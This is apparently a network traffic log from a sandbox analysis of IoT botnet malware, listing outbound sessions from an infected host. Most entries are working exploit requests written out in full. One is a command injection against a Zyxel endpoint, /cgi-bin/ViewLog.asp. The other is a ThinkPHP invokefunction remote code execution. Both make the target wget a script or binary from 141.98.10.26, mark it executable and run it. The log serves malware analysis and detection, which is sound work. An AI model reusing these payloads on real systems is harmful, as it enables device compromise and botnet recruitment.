Nov 22, 2023 08:40:25.343339920 CET	18879	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:25.918018103 CET	18898	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.069865942 CET	19019	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:29.437638998 CET	19347	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:34.045047045 CET	19727	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:43.259646893 CET	19766	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:02.201000929 CET	19781	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
946	192.168.2.23	41200	62.149.1.106	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:25.363246918 CET	18880	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
947	192.168.2.23	33624	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:25.384475946 CET	18881	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:34Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
948	192.168.2.23	37318	95.153.139.253	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:25.568099022 CET	18894	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:26.223807096 CET	18910	IN	HTTP/1.1 400 Bad Request Server: nginx/1.19.2 Date: Wed, 22 Nov 2023 07:40:26 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
949	192.168.2.23	43328	31.136.241.96	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:25.719130993 CET	18896	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:26.301987886 CET	18910	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.453809977 CET	19074	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:29.949429035 CET	19365	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:34.556785107 CET	19751	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:43.771729946 CET	19767	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:02.200978041 CET	19780	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
950	192.168.2.23	33640	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:26.042788982 CET	18899	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:35Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
951	192.168.2.23	51222	112.168.157.113	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:26.519287109 CET	18944	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:26.811399937 CET	18951	IN	HTTP/1.0 400 Bad Request Date: Wed, 22 Nov 2023 07:40:26 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
952	192.168.2.23	53566	112.125.187.162	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:26.532504082 CET	18945	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:26.841653109 CET	18951	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:27 GMT Server: Apache Content-Length: 11 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
953	192.168.2.23	54536	112.90.180.9	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:26.547501087 CET	18946	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:26.880079031 CET	18952	IN	HTTP/1.1 505 HTTP Version Not Supported Server: Apache-Coyote/1.1 Date: Wed, 22 Nov 2023 07:40:28 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
954	192.168.2.23	48118	112.25.90.160	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:26.613095999 CET	18947	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.009228945 CET	19013	IN	HTTP/1.1 400 Bad Request Server: yunjiasu Date: Wed, 22 Nov 2023 07:40:26 GMT Content-Type: text/html Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 79 75 6e 6a 69 61 73 75 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>yunjiasu</center></body></html>
Nov 22, 2023 08:40:27.225501060 CET	19031	IN	HTTP/1.1 400 Bad Request Server: yunjiasu Date: Wed, 22 Nov 2023 07:40:26 GMT Content-Type: text/html Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 79 75 6e 6a 69 61 73 75 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>yunjiasu</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
955	192.168.2.23	33648	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:26.711967945 CET	18948	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:35Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
956	192.168.2.23	46334	95.101.4.190	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:26.986182928 CET	19013	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.164577961 CET	19021	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:27 GMT Date: Wed, 22 Nov 2023 07:40:27 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 30 36 33 38 38 32 37 26 23 34 36 3b 31 36 37 31 61 61 35 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.77b0f748.1700638827.1671aa5c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
957	192.168.2.23	40926	95.101.181.75	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:27.009412050 CET	19014	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.201513052 CET	19022	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Wed, 22 Nov 2023 07:40:27 GMT Date: Wed, 22 Nov 2023 07:40:27 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 62 35 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 38 32 37 26 23 34 36 3b 32 61 31 62 65 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.47b5655f.1700638827.2a1be8</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
958	192.168.2.23	33104	95.28.230.13	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:27.014146090 CET	19015	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.220765114 CET	19026	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 22 Nov 2023 07:40:24 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
959	192.168.2.23	42150	95.220.219.105	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:27.026171923 CET	19015	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
